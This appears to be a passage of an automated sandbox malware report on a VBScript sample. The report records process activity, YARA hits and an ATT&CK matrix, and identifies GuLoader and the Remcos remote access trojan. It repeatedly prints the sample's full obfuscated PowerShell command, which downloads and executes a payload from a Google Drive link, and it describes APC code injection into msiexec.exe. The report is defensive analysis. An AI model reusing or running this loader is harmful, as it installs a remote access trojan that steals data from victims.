              Source: wscript.exe, 00000000.00000003.1074092587.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1093638183.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074527416.0000021B283B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074692808.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1095824496.0000021B283B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074125966.0000021B28391000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1095824496.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073438924.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1094045195.0000021B283B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073928101.0000021B283F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1093638183.0000021B283AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: PING.EXE, 00000002.00000002.1082058453.000001F44F989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02EC8F99 LdrInitializeThunk,14_2_02EC8F99

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_7608.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3064, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $overkindly;function speave227($posttypernes){ .($tunneldalenes) ($posttypernes)} function udgangspositioner($luftpudebaadenes92){$nonvernacular=4;do{$zoogeological+=$luftpudebaadenes92[$nonvernacular];$nonvernacular+=5;$underbodies119=format-list} until(!$luftpudebaadenes92[$nonvernacular])$zoogeological}$brnelrdommene=udgangspositioner 'ru,lnmilie routtils. so.w';$brnelrdommene+=udgangspositioner ' ungegallbkoerct,lel ot,iin.le sken eflt';$entrewernes=udgangspositioner 'trommprotoattezpo tipe.dlunqul s ra dis/';$seaboards=udgangspositioner 'b slt avilblodsauto1alle2';$fodnoter=' .ag[del nknogeamidtma e.nedrsdemoe,izzrt ngv ndyi,ijocmngdebortpsparo abliovernaf,otgambmchokashennsk faob ogbr deactirforv] m t:knys:envesfinmeboggcd eluretyrsta ie.eit yrystniplovermercorickt oprosci cfarmoskralmaxi=unde$asids omed kuam dsb eigo af,ame lrtonedreeds';$entrewernes+=udgangspositioner 'trin5sa g.lite0 sam af a(camowpol i ktinstrudinddo su.wtelescanc orthn prst nou is.1 st 0 nar.caut0dfa.;unsa mandwfloridedunsort6uni 4,niv;goll .iox akt6fu,s4solo;twit slir adivtale:cali1anti3 lux4in o.prov0a.ts) far sciegkommebortc u ikcrysou.de/stru2sawb0mis.1sulc0 adj0quiz1do n0worm1 spi ,locfsnusilabirlykkekrypfbastomillxjayw/ ypo1s ap3 eks4fluo.citr0';$netproblem=udgangspositioner 'trasuhap sallee citrskir-w,enaanglg,azae kienzilct';$tvangsauktioners=udgangspositioner 'cor h dattcytotbidsparbes end: ejo/a ti/ beada.virmanlicosmv oreep e.snurgrev oisobo emegkno l s,gedial.p ntcleibohonemk od/bedru,nusctviv? imejud.xplotpzon,ogre rupaatprod= .omdki.eopimpw obsnb nslh.peoxiphaparhd,alu&taphicitrdkaro=betj1com,lindewstegp o au non1haanppe,ak insla sb-unrepep,p-bun e s hm ien6for l arttr getdannkmargmfo hc aks2trit2 vadk aponr covcougmsiet9unreqtrice sensstri8sup z';$nonvernaculardeologikritik=udgangspositioner ' coe>';$tunneldalenes=udgangspositioner ' gruidra,eoutsx';$miaow='besvarer237';$minium='\prostituaqr.und';speave227 (udgangspositioner 'pr r$ pregyardlseino cutbdi tabrowlacri:sootiamebn titdg.ifit.bua mayn .smeargurtyvessmer=tris$.ndgevalfnskagvster: heagratp atuptoxid ammaaur.tcoenaflot+ gou$romam ho i l,knunp,i priubiocm');speave227 (udgangspositioner 'unsy$styrg re lstepoloweb,ueea velrefu:harata,azr ,olytimop arvala,ervalgsdampasyncmrudeice sdbaptenons=husb$gruntsha vemdaa franeurygmaissoleaabi tuer.vkfibet ,asi rthogittnba seddmarun usklim.biristrykpdis,lstnkiintetnumm( gil$dracnm alopur nsubcvbe de disr nagnunreadefic apousal,linstaergor ptedsabbe he ohec,l andolophg redisparkbe,sr in i semtindtich lktwen)');speave227 (udgangspositioner $fodnoter);$tvangsauktioners=$tryparsamide[0];$snefogets=(udgangspositioner ' udv$semigichtl r fofremb rrlawantlaldi: d,ffw odom,ckrbrystdysgsdo ot.iglt pa.e ras=r banfamie .odw ta,-dandocheabvisnj none r ccaksitanti pa.as,okuyteknsintetchame rysm ove. jyd$tyl b overf eln ankeuntrladoprmockd zebo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $overkindly;function speave227($posttypernes){ .($tunneldalenes) ($posttypernes)} function udgangspositioner($luftpudebaadenes92){$nonvernacular=4;do{$zoogeological+=$luftpudebaadenes92[$nonvernacular];$nonvernacular+=5;$underbodies119=format-list} until(!$luftpudebaadenes92[$nonvernacular])$zoogeological}$brnelrdommene=udgangspositioner 'ru,lnmilie routtils. so.w';$brnelrdommene+=udgangspositioner ' ungegallbkoerct,lel ot,iin.le sken eflt';$entrewernes=udgangspositioner 'trommprotoattezpo tipe.dlunqul s ra dis/';$seaboards=udgangspositioner 'b slt avilblodsauto1alle2';$fodnoter=' .ag[del nknogeamidtma e.nedrsdemoe,izzrt ngv ndyi,ijocmngdebortpsparo abliovernaf,otgambmchokashennsk faob ogbr deactirforv] m t:knys:envesfinmeboggcd eluretyrsta ie.eit yrystniplovermercorickt oprosci cfarmoskralmaxi=unde$asids omed kuam dsb eigo af,ame lrtonedreeds';$entrewernes+=udgangspositioner 'trin5sa g.lite0 sam af a(camowpol i ktinstrudinddo su.wtelescanc orthn prst nou is.1 st 0 nar.caut0dfa.;unsa mandwfloridedunsort6uni 4,niv;goll .iox akt6fu,s4solo;twit slir adivtale:cali1anti3 lux4in o.prov0a.ts) far sciegkommebortc u ikcrysou.de/stru2sawb0mis.1sulc0 adj0quiz1do n0worm1 spi ,locfsnusilabirlykkekrypfbastomillxjayw/ ypo1s ap3 eks4fluo.citr0';$netproblem=udgangspositioner 'trasuhap sallee citrskir-w,enaanglg,azae kienzilct';$tvangsauktioners=udgangspositioner 'cor h dattcytotbidsparbes end: ejo/a ti/ beada.virmanlicosmv oreep e.snurgrev oisobo emegkno l s,gedial.p ntcleibohonemk od/bedru,nusctviv? imejud.xplotpzon,ogre rupaatprod= .omdki.eopimpw obsnb nslh.peoxiphaparhd,alu&taphicitrdkaro=betj1com,lindewstegp o au non1haanppe,ak insla sb-unrepep,p-bun e s hm ien6for l arttr getdannkmargmfo hc aks2trit2 vadk aponr covcougmsiet9unreqtrice sensstri8sup z';$nonvernaculardeologikritik=udgangspositioner ' coe>';$tunneldalenes=udgangspositioner ' gruidra,eoutsx';$miaow='besvarer237';$minium='\prostituaqr.und';speave227 (udgangspositioner 'pr r$ pregyardlseino cutbdi tabrowlacri:sootiamebn titdg.ifit.bua mayn .smeargurtyvessmer=tris$.ndgevalfnskagvster: heagratp atuptoxid ammaaur.tcoenaflot+ gou$romam ho i l,knunp,i priubiocm');speave227 (udgangspositioner 'unsy$styrg re lstepoloweb,ueea velrefu:harata,azr ,olytimop arvala,ervalgsdampasyncmrudeice sdbaptenons=husb$gruntsha vemdaa franeurygmaissoleaabi tuer.vkfibet ,asi rthogittnba seddmarun usklim.biristrykpdis,lstnkiintetnumm( gil$dracnm alopur nsubcvbe de disr nagnunreadefic apousal,linstaergor ptedsabbe he ohec,l andolophg redisparkbe,sr in i semtindtich lktwen)');speave227 (udgangspositioner $fodnoter);$tvangsauktioners=$tryparsamide[0];$snefogets=(udgangspositioner ' udv$semigichtl r fofremb rrlawantlaldi: d,ffw odom,ckrbrystdysgsdo ot.iglt pa.e ras=r banfamie .odw ta,-dandocheabvisnj none r ccaksitanti pa.as,okuyteknsintetchame rysm ove. jyd$tyl b overf eln ankeuntrladoprmockd zebo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $overkindly;function speave227($posttypernes){ .($tunneldalenes) ($posttypernes)} function udgangspositioner($luftpudebaadenes92){$nonvernacular=4;do{$zoogeological+=$luftpudebaadenes92[$nonvernacular];$nonvernacular+=5;$underbodies119=format-list} until(!$luftpudebaadenes92[$nonvernacular])$zoogeological}$brnelrdommene=udgangspositioner 'ru,lnmilie routtils. so.w';$brnelrdommene+=udgangspositioner ' ungegallbkoerct,lel ot,iin.le sken eflt';$entrewernes=udgangspositioner 'trommprotoattezpo tipe.dlunqul s ra dis/';$seaboards=udgangspositioner 'b slt avilblodsauto1alle2';$fodnoter=' .ag[del nknogeamidtma e.nedrsdemoe,izzrt ngv ndyi,ijocmngdebortpsparo abliovernaf,otgambmchokashennsk faob ogbr deactirforv] m t:knys:envesfinmeboggcd eluretyrsta ie.eit yrystniplovermercorickt oprosci cfarmoskralmaxi=unde$asids omed kuam dsb eigo af,ame lrtonedreeds';$entrewernes+=udgangspositioner 'trin5sa g.lite0 sam af a(camowpol i ktinstrudinddo su.wtelescanc orthn prst nou is.1 st 0 nar.caut0dfa.;unsa mandwfloridedunsort6uni 4,niv;goll .iox akt6fu,s4solo;twit slir adivtale:cali1anti3 lux4in o.prov0a.ts) far sciegkommebortc u ikcrysou.de/stru2sawb0mis.1sulc0 adj0quiz1do n0worm1 spi ,locfsnusilabirlykkekrypfbastomillxjayw/ ypo1s ap3 eks4fluo.citr0';$netproblem=udgangspositioner 'trasuhap sallee citrskir-w,enaanglg,azae kienzilct';$tvangsauktioners=udgangspositioner 'cor h dattcytotbidsparbes end: ejo/a ti/ beada.virmanlicosmv oreep e.snurgrev oisobo emegkno l s,gedial.p ntcleibohonemk od/bedru,nusctviv? imejud.xplotpzon,ogre rupaatprod= .omdki.eopimpw obsnb nslh.peoxiphaparhd,alu&taphicitrdkaro=betj1com,lindewstegp o au non1haanppe,ak insla sb-unrepep,p-bun e s hm ien6for l arttr getdannkmargmfo hc aks2trit2 vadk aponr covcougmsiet9unreqtrice sensstri8sup z';$nonvernaculardeologikritik=udgangspositioner ' coe>';$tunneldalenes=udgangspositioner ' gruidra,eoutsx';$miaow='besvarer237';$minium='\prostituaqr.und';speave227 (udgangspositioner 'pr r$ pregyardlseino cutbdi tabrowlacri:sootiamebn titdg.ifit.bua mayn .smeargurtyvessmer=tris$.ndgevalfnskagvster: heagratp atuptoxid ammaaur.tcoenaflot+ gou$romam ho i l,knunp,i priubiocm');speave227 (udgangspositioner 'unsy$styrg re lstepoloweb,ueea velrefu:harata,azr ,olytimop arvala,ervalgsdampasyncmrudeice sdbaptenons=husb$gruntsha vemdaa franeurygmaissoleaabi tuer.vkfibet ,asi rthogittnba seddmarun usklim.biristrykpdis,lstnkiintetnumm( gil$dracnm alopur nsubcvbe de disr nagnunreadefic apousal,linstaergor ptedsabbe he ohec,l andolophg redisparkbe,sr in i semtindtich lktwen)');speave227 (udgangspositioner $fodnoter);$tvangsauktioners=$tryparsamide[0];$snefogets=(udgangspositioner ' udv$semigichtl r fofremb rrlawantlaldi: d,ffw odom,ckrbrystdysgsdo ot.iglt pa.e ras=r banfamie .odw ta,-dandocheabvisnj none r ccaksitanti pa.as,okuyteknsintetchame rysm ove. jyd$tyl b overf eln ankeuntrladoprmockd zeboJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000010.00000002.1904170873.00000000087D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-5VYA3JJump to behavior
              Source: Yara matchFile source: 00000010.00000002.1904170873.00000000087D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              311
              Process Injection
              1
              Masquerading
              OS Credential Dumping21
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              41
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)311
              Process Injection
              Security Account Manager41
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Remote System Discovery
              SSHKeylogging13
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634208 Sample: PEDIDO DE OR#U00c7AMENTO (U... Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 32 edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->32 34 drive.usercontent.google.com 2->34 36 2 other IPs or domains 2->36 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Yara detected GuLoader 2->50 52 6 other signatures 2->52 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 svchost.exe 1 2->13         started        16 msiexec.exe 2->16         started        signatures3 process4 dnsIp5 58 VBScript performs obfuscated calls to suspicious functions 8->58 60 Suspicious powershell command line found 8->60 62 Wscript starts Powershell (via cmd or directly) 8->62 72 2 other signatures 8->72 18 powershell.exe 14 20 8->18         started        22 PING.EXE 1 8->22         started        64 Early bird code injection technique detected 11->64 66 Writes to foreign memory regions 11->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 11->68 70 Queues an APC in another process (thread injection) 11->70 24 msiexec.exe 6 11->24         started        26 conhost.exe 11->26         started        44 127.0.0.1 unknown unknown 13->44 signatures6 process7 dnsIp8 38 drive.google.com 142.250.185.110, 443, 49707, 49708 GOOGLEUS United States 18->38 40 drive.usercontent.google.com 142.250.186.33, 443, 49709 GOOGLEUS United States 18->40 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 28 conhost.exe 18->28         started        30 conhost.exe 22->30         started        42 142.250.185.225, 443, 49721 GOOGLEUS United States 24->42 56 Detected Remcos RAT 24->56 signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.